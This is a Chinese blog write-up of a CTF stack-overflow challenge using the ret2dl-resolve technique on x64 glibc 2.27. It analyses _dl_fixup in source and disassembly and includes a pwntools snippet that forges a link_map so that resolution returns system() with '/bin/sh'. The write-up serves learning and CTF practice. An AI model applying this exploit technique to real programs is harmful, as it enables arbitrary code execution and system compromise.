【WriteUp】栈溢出之ret2dl-reslove

已于 2023-03-08 09:39:32 修改
阅读量698 收藏
点赞数 1
分类专栏: WriteUp 文章标签: c++ python
于 2023-03-08 02:26:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39933891/article/details/129395308
版权
文章深入分析了glibc中的延迟绑定机制,包括_dl_runtime_resolve_xsavec函数如何保存和还原调用参数环境,以及_dl_fixup函数如何进行符号查找和绑定。在PartialRELRO保护下,通过伪造LinkMap结构来实现特定功能的利用,特别关注了FakeLinkMap的构造和注意事项。文章最后提出了在计算负数地址时遇到的问题。
摘要由CSDN通过智能技术生成

目录

笔记

[!NOTE] 在pwndbg中查看结构体定义
pwndbg> ptype Struct

程序分析

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf[256]; // [rsp+0h] [rbp-100h] BYREF

  read(0, buf, 0x1000uLL);
  return 0;
}

/*
Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x3ff000)
RUNPATH:  b'/root/tools/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/'
*/

超大的栈溢出,保护只开了NXPartial RELRO

ELF中没有后门函数,可利用字符串,可用的函数也只有read

>>>elf.plt

{‘read’: 4195312}

>>>elf.got

{‘__libc_start_main’: 6295536, ‘__gmon_start__’: 6295544, ‘read’: 6295576}

利用分析

延迟绑定技术

为避免在运行程序时加载过多的动态链接导致卡顿,操作系统实现了延迟绑定(Lazy Binding)的技术,只有在函数首次调用时才进行绑定,

当程序首次 call func@plt,将执行以下操作,此处拿read@plt作为示例

.text:0000000000400506               call    _read

_read proc near
.plt:00000000004003F0                jmp     cs:off_601018
_read endp
.plt:00000000004003F6                push    0
.plt:00000000004003FB                jmp     plt_0

当程序每次call _read时,都将跳转至0x4003F0执行jmp语句,在首次调用时,cs:off_601018指向read@plt的下一条指令,即0x4003F6以进行绑定操作,在第一次调用后,cs:off_601018将指向read的真正地址

plt_0 proc near                         
.plt:00000000004003E0             push    cs:linkMap
.plt:00000000004003E6             jmp     cs:_dl_runtime_resolve
plt_0 endp

push cs:linkMap后跳转至_dl_runtime_resolve函数,加上read@plt中push 0,此处即调用_dl_runtime_resolve(linkMap,0)

_dl_runtime_resolve_xsavec函数分析

;↓↓↓↓↓↓↓↓↓↓保存调用参数环境↓↓↓↓↓↓↓↓↓↓
0x00007ffff7c17750 <+0>:	push   rbx
0x00007ffff7c17751 <+1>:	mov    rbx,rsp
0x00007ffff7c17754 <+4>:	and    rsp,0xffffffffffffffc0
0x00007ffff7c17758 <+8>:	sub    rsp,QWORD PTR [rip+0x2100a9]        # 0x7ffff7e27808 <_rtld_global_ro+168>
0x00007ffff7c1775f <+15>:	mov    QWORD PTR [rsp],rax
0x00007ffff7c17763 <+19>:	mov    QWORD PTR [rsp+0x8],rcx
0x00007ffff7c17768 <+24>:	mov    QWORD PTR [rsp+0x10],rdx
0x00007ffff7c1776d <+29>:	mov    QWORD PTR [rsp+0x18],rsi
0x00007ffff7c17772 <+34>:	mov    QWORD PTR [rsp+0x20],rdi
0x00007ffff7c17777 <+39>:	mov    QWORD PTR [rsp+0x28],r8
0x00007ffff7c1777c <+44>:	mov    QWORD PTR [rsp+0x30],r9
0x00007ffff7c17781 <+49>:	mov    eax,0xee
0x00007ffff7c17786 <+54>:	xor    edx,edx
0x00007ffff7c17788 <+56>:	mov    QWORD PTR [rsp+0x250],rdx
0x00007ffff7c17790 <+64>:	mov    QWORD PTR [rsp+0x258],rdx
0x00007ffff7c17798 <+72>:	mov    QWORD PTR [rsp+0x260],rdx
0x00007ffff7c177a0 <+80>:	mov    QWORD PTR [rsp+0x268],rdx
0x00007ffff7c177a8 <+88>:	mov    QWORD PTR [rsp+0x270],rdx
0x00007ffff7c177b0 <+96>:	mov    QWORD PTR [rsp+0x278],rdx
0x00007ffff7c177b8 <+104>:	xsavec [rsp+0x40]
0x00007ffff7c177bd <+109>:	mov    rsi,QWORD PTR [rbx+0x10]
0x00007ffff7c177c1 <+113>:	mov    rdi,QWORD PTR [rbx+0x8]
;↑↑↑↑↑↑↑↑↑↑保存调用参数环境↑↑↑↑↑↑↑↑↑↑
0x00007ffff7c177c5 <+117>:	call   0x7ffff7c0fdf0 <_dl_fixup>;真正的绑定查询函数
0x00007ffff7c177ca <+122>:	mov    r11,rax ;将结果保存至R11
;↓↓↓↓↓↓↓↓↓↓还原调用参数环境↓↓↓↓↓↓↓↓↓↓
0x00007ffff7c177cd <+125>:	mov    eax,0xee
0x00007ffff7c177d2 <+130>:	xor    edx,edx
0x00007ffff7c177d4 <+132>:	xrstor [rsp+0x40]
0x00007ffff7c177d9 <+137>:	mov    r9,QWORD PTR [rsp+0x30]
0x00007ffff7c177de <+142>:	mov    r8,QWORD PTR [rsp+0x28]
0x00007ffff7c177e3 <+147>:	mov    rdi,QWORD PTR [rsp+0x20]
0x00007ffff7c177e8 <+152>:	mov    rsi,QWORD PTR [rsp+0x18]
0x00007ffff7c177ed <+157>:	mov    rdx,QWORD PTR [rsp+0x10]
0x00007ffff7c177f2 <+162>:	mov    rcx,QWORD PTR [rsp+0x8]
0x00007ffff7c177f7 <+167>:	mov    rax,QWORD PTR [rsp]
0x00007ffff7c177fb <+171>:	mov    rsp,rbx
0x00007ffff7c177fe <+174>:	mov    rbx,QWORD PTR [rsp]
0x00007ffff7c17802 <+178>:	add    rsp,0x18
;↑↑↑↑↑↑↑↑↑↑还原调用参数环境↑↑↑↑↑↑↑↑↑↑
0x00007ffff7c17806 <+182>:	bnd jmp r11 ;跳转至原目标函数

可以看到_dl_runtime_resolve_xsavec函数只负责

1.保存原目标函数(read)的参数环境

2.调用_dl_fixup查询并绑定read的真正地址至linkMap中指定的重定位地址

3.还原原目标函数(read)的参数环境

4.跳转至_dl_fixup的查询结果

而真正做查询绑定操作的是_dl_fixup函数

_dl_fixup函数分析

glibc2.27 下_dl_fixup函数源码分析
_dl_fixup(struct link_map *l, ElfW(Word) reloc_arg)
{

    //符号表symtab = linkMap->l_info[6]
    const ElfW(Sym) *const symtab = (const void *)D_PTR(l, l_info[DT_SYMTAB]);

    //字符串表strtab = linkMap->l_info[5]
    const char *strtab = (const void *)D_PTR(l, l_info[DT_STRTAB]);

    //重定位表reloc = linkMap->l_info[23] + reloc_arg
    const PLTREL *const reloc = (const void *)(D_PTR(l, l_info[DT_JMPREL]) + reloc_offset);

    //定位符号sym = symtab[reloc->r_info] 此处使用reloc->r_info的高32位作为索引
    const ElfW(Sym) *sym = &symtab[ELFW(R_SYM)(reloc->r_info)];
    const ElfW(Sym) *refsym = sym;

    //重定位地址(rel_addr) = LinkMap->l_addr + reloc->r_offset
    void *const rel_addr = (void *)(l->l_addr + reloc->r_offset);

    lookup_t result;
    DL_FIXUP_VALUE_TYPE value;

    /* 判断重定位类型是否为7--ELF_MACHINE_JMP_SLOT */
    assert(ELFW(R_TYPE)(reloc->r_info) == ELF_MACHINE_JMP_SLOT);

    /*此处判断sym->st_other的最后两位是否为0*/
    if (__builtin_expect(ELFW(ST_VISIBILITY)(sym->st_other), 0) == 0)
    {
        const struct r_found_version *version = NULL;
        if (l->l_info[VERSYMIDX(DT_VERSYM)] != NULL)
        {
            const ElfW(Half) *vernum =
                (const void *)D_PTR(l, l_info[VERSYMIDX(DT_VERSYM)]);
            ElfW(Half) ndx = vernum[ELFW(R_SYM)(reloc->r_info)] & 0x7fff;
            version = &l->l_versions[ndx];
            if (version->hash == 0)
                version = NULL;
        }
        int flags = DL_LOOKUP_ADD_DEPENDENCY; //156
        if (!RTLD_SINGLE_THREAD_P)//171
        {
            THREAD_GSCOPE_SET_FLAG();
            flags |= DL_LOOKUP_GSCOPE_LOCK;
        }
          
#ifdef RTLD_ENABLE_FOREIGN_CALL
        RTLD_ENABLE_FOREIGN_CALL;
#endif
        result = _dl_lookup_symbol_x(strtab + sym->st_name, l, &sym, l->l_scope, 
                                     version, ELF_RTYPE_CLASS_PLT, flags, NULL);
        /* We are done with the global scope.  */
        if (!RTLD_SINGLE_THREAD_P)//+226
            THREAD_GSCOPE_RESET_FLAG();
#ifdef RTLD_FINALIZE_FOREIGN_CALL
        RTLD_FINALIZE_FOREIGN_CALL;
#endif
        /* Currently result contains the base load address (or link map)
       of the object that defines sym.  Now add in the symbol
       offset.  */
        value = DL_FIXUP_MAKE_VALUE(result,sym ? (LOOKUP_VALUE_ADDRESS(result) + sym->st_value) : 0);
    }
    else
    {
        //绑定查询结果等于 linkMap->l_addr + sym->st_value
        value = DL_FIXUP_MAKE_VALUE(l, l->l_addr + sym->st_value);
        result = l;
    }
    
    value = elf_machine_plt_value(l, reloc, value);
    if (sym != NULL && __builtin_expect(ELFW(ST_TYPE)(sym->st_info) == STT_GNU_IFUNC, 0))
        value = elf_ifunc_invoke(DL_FIXUP_VALUE_ADDR(value));
    /* Finally, fix up the plt itself.  */
    if (__glibc_unlikely(GLRO(dl_bind_not)))
        return value;
    return elf_machine_fixup_plt(l, result, refsym, sym, reloc, rel_addr, value);
}
libc-2.27-ubuntu1-amd64下__dl_fixup函数汇编分析
<+0>:	push   rbx
<+1>:	mov    r10,rdi  						;r10 = rdi = LinkMap
<+4>:	mov    esi,esi
<+6>:	lea    rdx,[rsi+rsi*2]					;rdx = rsi = 0
<+10>:	sub    rsp,0x10
;const char *strtab = (const void *)D_PTR(l, l_info[DT_STRTAB]);
<+14>:	mov    rax,QWORD PTR [rdi+0x68]		;rax = DT_STRTAB
<+18>:	mov    rdi,QWORD PTR [rax+0x8]		;rdi = ELF String Table

;const PLTREL *const reloc = (const void *)(D_PTR(l, l_info[DT_JMPREL]) + reloc_offset);
<+22>:	mov    rax,QWORD PTR [r10+0xf8]		;rax = DT_JMPREL
<+29>:	mov    rax,QWORD PTR [rax+0x8]		;rax = Elf64_Rela

;const ElfW(Sym) *const symtab = (const void *)D_PTR(l, l_info[DT_SYMTAB]);
<+33>:	lea    r8,[rax+rdx*8]				;r8 = rax = Elf64_Rela
<+37>:	mov    rax,QWORD PTR [r10+0x70]		;rax = DT_SYMTAB

;const PLTREL *const reloc = (const void *)(D_PTR(l, l_info[DT_JMPREL]) + reloc_offset);
<+41>:	mov    rcx,QWORD PTR [r8+0x8]		;rcx = Elf64_Rela->r_info
<+45>:	mov    rbx,QWORD PTR [r8]			;rbx = Elf64_Rela->r_offset

const ElfW(Sym) *sym = &symtab[ELFW(R_SYM)(reloc->r_info)];
<+48>:	mov    rax,QWORD PTR [rax+0x8]		;rax = Elf64_Sym
<+52>:	mov    rdx,rcx						;rdx = rcx = Elf64_Rela->r_info
<+55>:	shr    rdx,0x20						;rdx = rdx >> 0x20 = Elf64_Rela->r_info>>0x20
<+59>:	lea    rsi,[rdx+rdx*2]
<+63>:	lea    rsi,[rax+rsi*8]				;rsi = Elf64_Sym[Elf64_Rela->r_info >> 32]

;const PLTREL *const reloc = (const void *)(D_PTR(l, l_info[DT_JMPREL]) + reloc_offset);
<+67>:	mov    rax,QWORD PTR [r10]			;rax = linkMap->l_addr
<+70>:	mov    QWORD PTR [rsp+0x8],rsi		;var_sym = rsi
<+75>:	add    rbx,rax

;assert(ELFW(R_TYPE)(reloc->r_info) == ELF_MACHINE_JMP_SLOT);
<+78>:	cmp    ecx,0x7
<+81>:	jne    0x7fa516a0ff64 <_dl_fixup+372>

;if (__builtin_expect(ELFW(ST_VISIBILITY)(sym->st_other), 0) == 0)
<+87>:	test   BYTE PTR [rsi+0x5],0x3
<+91>:	jne    0x7fa516a0fee8 <_dl_fixup+248>

<+97>:	mov    rax,QWORD PTR [r10+0x1c8]
<+104>:	xor    r8d,r8d
<+107>:	test   rax,rax
<+110>:	je     0x7fa516a0fe8c <_dl_fixup+156>
<+112>:	mov    rax,QWORD PTR [rax+0x8]
<+116>:	movzx  eax,WORD PTR [rax+rdx*2]
<+120>:	and    eax,0x7fff
<+125>:	lea    rdx,[rax+rax*2]
<+129>:	mov    rax,QWORD PTR [r10+0x2e0]
<+136>:	lea    r8,[rax+rdx*8]
<+140>:	mov    eax,0x0
<+145>:	mov    r9d,DWORD PTR [r8+0x8]
<+149>:	test   r9d,r9d
<+152>:	cmove  r8,rax
<+156>:	mov    edx,DWORD PTR fs:0x18
<+164>:	test   edx,edx
<+166>:	mov    eax,0x1
<+171>:	jne    0x7fa516a0ff48 <_dl_fixup+344>
<+177>:	mov    esi,DWORD PTR [rsi]
<+179>:	mov    rcx,QWORD PTR [r10+0x380]
<+186>:	lea    rdx,[rsp+0x8]
<+191>:	push   0x0
<+193>:	push   rax
<+194>:	mov    r9d,0x1
<+200>:	add    rdi,rsi
<+203>:	mov    rsi,r10
<+206>:	call   0x7fa516a0b0b0 <_dl_lookup_symbol_x>
<+211>:	mov    r8,rax
<+214>:	mov    eax,DWORD PTR fs:0x18
<+222>:	test   eax,eax
<+224>:	pop    rcx
<+225>:	pop    rsi
<+226>:	jne    0x7fa516a0ff10 <_dl_fixup+288>
<+228>:	mov    rsi,QWORD PTR [rsp+0x8]
<+233>:	xor    eax,eax

;if (sym != NULL && __builtin_expect(ELFW(ST_TYPE)(sym->st_info) == STT_GNU_IFUNC, 0))
<+235>:	test   rsi,rsi
<+238>:	je     0x7fa516a0fef8 <_dl_fixup+264>;sym == NULL

<+240>:	test   r8,r8
<+243>:	je     0x7fa516a0fee8 <_dl_fixup+248>
<+245>:	mov    rax,QWORD PTR [r8]

;value = DL_FIXUP_MAKE_VALUE(l, l->l_addr + sym->st_value);
<+248>:	movzx  edx,BYTE PTR [rsi+0x4]			;edx = [rsi+0x4] = sym->st_info
<+252>:	add    rax,QWORD PTR [rsi+0x8]			;rax = rax + [rsi+0x8] = linkMap->l_addr + sym->st_value 此命令执行完后rax = 真正函数地址

;if (sym != NULL && __builtin_expect(ELFW(ST_TYPE)(sym->st_info) == STT_GNU_IFUNC, 0))
<+256>:	and    edx,0xf							
<+259>:	cmp    dl,0xa							;if sym->st_info == STT_GNU_IFUNC						
<+262>:	je     0x7fa516a0ff60 <_dl_fixup+368>	

;if (__glibc_unlikely(GLRO(dl_bind_not)))
<+264>:	mov    edx,DWORD PTR [rip+0x2178aa]		;edx = dl_bind_not
<+270>:	test   edx,edx
<+272>:	jne    0x7fa516a0ff05 <_dl_fixup+277>	;if (__glibc_unlikely(GLRO(dl_bind_not)))

;return value;
<+274>:	mov    QWORD PTR [rbx],rax				;reloc = 绑定查询结果
<+277>:	add    rsp,0x10
<+281>:	pop    rbx
<+282>:	ret

<+283>:	nop    DWORD PTR [rax+rax*1+0x0]
<+288>:	xor    eax,eax
<+290>:	xchg   DWORD PTR fs:0x1c,eax
<+298>:	cmp    eax,0x2
<+301>:	jne    0x7fa516a0fed4 <_dl_fixup+228>
<+303>:	mov    rdi,QWORD PTR fs:0x10
<+312>:	xor    r10d,r10d
<+315>:	add    rdi,0x1c
<+319>:	mov    edx,0x1
<+324>:	mov    esi,0x81
<+329>:	mov    eax,0xca
<+334>:	syscall 
<+336>:	jmp    0x7fa516a0fed4 <_dl_fixup+228>
<+338>:	nop    WORD PTR [rax+rax*1+0x0]
<+344>:	mov    DWORD PTR fs:0x1c,0x1
<+356>:	mov    eax,0x5
<+361>:	jmp    0x7fa516a0fea1 <_dl_fixup+177>
<+366>:	xchg   ax,ax

;value = elf_ifunc_invoke(DL_FIXUP_VALUE_ADDR(value));
<+368>:	call   rax

<+370>:	jmp    0x7fa516a0fef8 <_dl_fixup+264>	;if (__glibc_unlikely(GLRO(dl_bind_not)))
<+372>:	lea    rcx,[rip+0x132fd]        # 0x7fa516a23268 <__PRETTY_FUNCTION__.10843>
<+379>:	lea    rsi,[rip+0x1115a]        # 0x7fa516a210cc
<+386>:	lea    rdi,[rip+0x132b7]        # 0x7fa516a23230
<+393>:	mov    edx,0x50
<+398>:	call   0x7fa516a1b790 <__GI___assert_fail>;重定位类型不等于7

由于本题是x64且保护Partial RELRO,所以暂不分析st_other==0的情况

根据源码和汇编的分析,可知

  • 最终绑定函数地址 = linkMap->l_addr + sym->st_value
  • 最终绑定函数地址写入位置 = linkMap->l_addr + reloc->r_offset

解题思路

伪造LinkMap

伪造LinkMap->l_addr 作为偏移以计算最终绑定函数地址

伪造LinkMap->l_info[JMPREL]及ELF64_Rela 以定位sym索引及重定位地址

伪造LinkMap->l_info[SYMTAB] 来定位libc函数将st_value作为基址以计算最终绑定函数地址

图解FakeLinkMap

以下是需要伪造的LinkMap结构分析

为LinkMap成员和FakeLinkMap需伪造成员的对照

为FakeLinkMap需伪造成员的结构和位置

为FakeLinkMap伪造后的具体成员结构和值

由于不采用_dl_lookup_symbol_x查询函数,所以无需伪造ELF_Sym结构体,直接将其指向__libc_start_main_got-0x8即可,这样即可得到sym->st_value__libc_start_main的真实地址,而最终地址为 l_addr - sym->st_value ,所以只需计算并传入这个偏移 l_addr 即可获得最终函数的地址

注意事项

1.虽然在利用中DT_STRTAB未被使用,但仍需将其和成员String table指向一块可读写的空间

2.虽然并不需要用到绑定写入的最终函数地址,但仍需计算并指定reloc->r_offset使重定位地址落在一个可读写的内存空间上

3.LinkMap的DT_PTR并不直接指向ELF结构体,而是指向Dynamic结构体

最终FakeLinkMap代码

from pwn import *

elf = ELF("./prog")
libc = ELF("./libc-2.27.so")

bss = 0x601030
FakeLinkMap = bss+0x110
l_addr = libc.sym['system'] - libc.sym['__libc_start_main']

linkMap = p64(l_addr)
linkMap += p64(0x17)
linkMap += p64(FakeLinkMap + 0x18)
linkMap += p64(FakeLinkMap + 0x100 - l_addr)
linkMap += p64(7)
linkMap += p64(0)
linkMap += p64(0x6)
linkMap += p64(elf.got['__libc_start_main']-0x8)
linkMap += b'/bin/sh\x00'
linkMap = linkMap.ljust(0x60,b'A')
linkMap += p64(FakeLinkMap + 0x100 - l_addr)
linkMap += p64(FakeLinkMap + 0x58)
linkMap += p64(FakeLinkMap + 0x30)
linkMap = linkMap.ljust(0xf8,b'A')
linkMap += p64(FakeLinkMap + 0x8)

遗留问题

l_addr的计算有可能是负数,Python里-1就是-1,但是p64函数并不接受一个负数,必须让-1不是-1而是0xFFFFFFFFFFFFFFFF,所以我手动计算负数的值并将其写为十六进制以避免p64()函数报错,由于我编码能力垃圾暂时也没想明白怎么解决

如果分析有问题,欢迎指出

暮诚Mucream
关注
专栏目录
PWN STEP2 writeup —— 初试溢出
格物致知
05-02 3266
Hint:缓冲区溢出时需要构造好哪些东西? 题目描述: pwnstep Writeup: 纠结要不要把这篇writeup归到“原创”分类下,因为这道题是看了大神的writeup(注:http://blog.csdn.net/zh_explorer/article/details/45193905)之后才做出来的。。。。。。。。。 不过脚本完全是自己写的,所以姑且将它算为“原创”吧
CTF|HITCON-Training-master lab4 writeupret2libc题型)
skyattractive的博客
06-12 390
CTF|HITCON-Training-master lab4 writeupret2libc题型) 做题做题前先看看ctfwiki上对ret2libc的原理描述 原理 ret2libc 即控制函数的执行 libc 中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置(即函数对应的 got表项的内容)。一般情况下,我们会选择执行 system("/bin/sh"),故而此时我们需要知道 system 函数的地址。 思路 总体思路就是我们遇到没有system没有"/bin/sh"的文件 我们
Writeup
Ater的博客
11-19 637
十一月份上旬总结 在做这道题目之前下载了虚拟机安装好了Ubuntu 然后弄好共享文件夹(经过百度我在Ubuntu中找到了我创建的share共享文件夹) 然后将此题的附件下载到share文件夹,并且改好名字,因为名字太长不方便使用,我改成了linux 分析题目,需要在linux里面找到关于flag的东西 打开终端,输入以下代码进入root身份(经过百度已经创建好了root身份) su root ...
删除系统文件/lib64/ld-linux-x86-64.so.2导致所有命令都用不了怎么办?
qq_28488285的博客
07-01 1938
因为要升级glibc,傻傻的我直接把之前的软连接删除了,现在变成了什么命令也识别不了了,然后一度陷入了空幻,完了,我又要重新装系统了,我是谁。。。我在哪。。。 不要慌,深吸一口气,这个问题是可以解决的!! 下面是我的图,这是删除之前的状态 直接在root权限下执行下面的代码,就全部恢复出来了。注意链接文件的前后顺序。 /lib/x86_64-linux-gnu/ld-2.27.so /bin/ln -s /lib/x86_64-linux-gnu/ld-2.27.so /lib6...
gcc编译选项说明(1)
04-13 4507
gcc编译选项
溢出学习
feng的博客
01-16 1945
前言 跟着ctfwiki学习,所有题目都在ctfwiki上可以找到。加油加油。 溢出原理 溢出指的是程序向中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的中的变量的值被改变。 看一个简单的程序: #include <stdio.h> #include <string.h> void success() { puts("You Hava already controlled it."); system("/bin/sh"); } void
pwn刷题num14-----溢出
tbsqigongzi的博客
04-22 131
攻防世界pwn进阶区反应釜开关控制 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位,小端序 开启部分RELRO---got表仍可写 未开启canary保护---存在溢出 开启NX保护----注入的shellcode不可执行 未开启PIE----程序地址为真实地址 动态链接 ida一下 发现溢出(灰色部分) 查看区,v5距离返回地址0x208字节(0x200+0x8) 查找有没有后门函数,发现一个shell函数 exp from pwn import
pwn溢出10道练习题有writeup
01-04
5. **堆溢出**:虽然题目主要关注溢出,但了解堆溢出也很重要,因为它与溢出有许多相似之处。堆是另一种动态内存分配区域,其溢出可能导致内存破坏,也可能影响到其他堆块。 6. **编写exploit**:掌握如何编写...
S2 AWD排位赛-9.zip
12-07
2. **XSS攻击**:网页可能没有对用户输入进行充分的过滤或转义,导致可以注入可执行的JavaScript代码。攻击者可以通过这种漏洞在其他用户浏览器上执行恶意脚本,获取用户的会话信息或执行其他操作。 3. **文件包含...
【墨者学院writeup】浏览器信息伪造之User-Agent及NetType微信网络检测破解
iqiqiya的博客
05-21 4423
 题目地址:http://219.153.49.228:48756/题目介绍:用到的知识:User-Agent(用户代理)字符串是Web浏览器用于声明自身型号版本并随HTTP请求发送给Web服务器的字符串,在Web服务器上可以获取到该字符串。 从微信6.0开始,其内嵌的浏览器在UserAgent字符串中增加了NetType字段用于标识客户端(手机)当前的网络环境,经测试,该字段至少有以下3个取值:...
延迟绑定初略分析
m0_48127441的博客
02-24 138
.text 0x400b3f <main+23> call puts@plt <0x4006e0> 即 .plt 0x4006e0 jmp [0x602020] 即 jmp 0x4006e6 然后执行了 dl_runtime_rssolve_xsavec //写时修复 当第二次调用时 然后再分析PLT表 PLT 其实就是为了执行 runtime_resolve_xsavec 如...
runtime 分类结构体_64位ret2_dl_runtime_resolve模版题以及踩坑记录
weixin_39646107的博客
01-02 453
什么是ret2dl攻击当程序在第一次加载某个函数的时候,got表中对应的表项还没有写入真实的地址(因为是第一次调用),所以这个时候就需要调用_dl_runtime_resolve函数将真实的地址写入got表对应的表项中,然后将控制权交还这个函数,此时就完成了第一次的调用,got表中也有了对应的真实地址。整个调用过程梳理_dl_fixup之前当我们第一调用read时,他的跳转过程是read@plt ...
_dl_runtime_resolve源码分析
conansonic的博客
01-23 8053
_dl_runtime_resolve 重定位、动态链接、静态连接、延迟绑定
动态链接 lazy binding 的原理与 GOT 表的保留表项
龙瑜的博客
11-11 1262
前言 我最近对动态库的实现非常好奇,自己琢磨了半天没有看出什么名堂,就想着能不 能找到一本讲相关内容的书籍,网上搜索了下发现确实有这样的一本书,书名为 《Linux 二进制分析》。 动态库的工作原理从这本书中能够找到解答,在本文中,我将使用下面这个 hello 程序来验证。 #include <stdio.h> int main(int argc, char* argv[]) { printf("hello world\n"); return 0; } 第一个问题:printf 函数调用
glibc动态链接器dl_runtime_resolve简要分析
Hello World.c
05-05 3127
dl_runtime_resolve简要分析 资料 glibc 2.9 source linux elf 手册 &各种百度搜索 基于32位elf,64位一些结构会略有不同,新手学习,如果有理解错误,请师傅们帮忙指出。 elf执行时动态绑定简要分析 动态链接的过程 动态链接中起到核心作用的是got节和plt节,链接器为所有共享目标文件(shared object)中未定义的(undef)外部...
延迟绑定 PLT
a2234503831b的博客
03-23 516
延迟绑定 PLT 测试代码:main.c void func1(int i){ printf("%d\n",i); } int main() { func1(static_var + static_var2 + a + b); return a; } $ gcc -g main.c -o main $ objdump -d main Disassembly of section .p...
_dl_runtime_resolve
farmwang的专栏
06-21 2110
_dl_runtime_resolve是怎么知要查找printf函数的_dl_runtime_resolve找到printf函数地址之后,它怎么知道回填到哪个GOT表项到底_dl_runtime_resolve是什么时候被写到GOT表的 前2个问题,只需要一个信息就可以了知道,这个信息就在藏在在函数对应的xxx@plt表中,以foo@plt为例: 0000000000400590 :
Linux二进制ELF程序查找symbol过程分析
ronnie88597的博客
09-18 3479
文章目录0.相关section的简介.got.plt.got.plt.plt.got1.关于Partial RELRO下的外部函数延迟/惰性(lazily)调用的过程分析1.1例子1.2静态编译结果初步分析1.3GOTPLT_ADDR是什么地址?jmp到该地址将会完成那些功能?1.4对比Partial Full下的符号查找过程1.5总结一下2.参考[Runtime Dynamic Linking](http://users.eecs.northwestern.edu/~kch479/docs/notes/l
pwn(无system函数下的溢出漏洞利用 | 【puts函数】
weixin_43742794的博客
08-09 3455
pwn100及exp 首先用checksec看一下权限的情况 扔进ida64发现是一个溢出漏洞,但是并没有system函数和/bin/sh可以使用 这里需要用到一个DynELF类 具体细节可以参见这篇文章 https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=42933&highlight=pwn 核心思路是通过DynELF泄...
oscp 2023 challenge writeup-medtech-csdn博客
最新发布
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值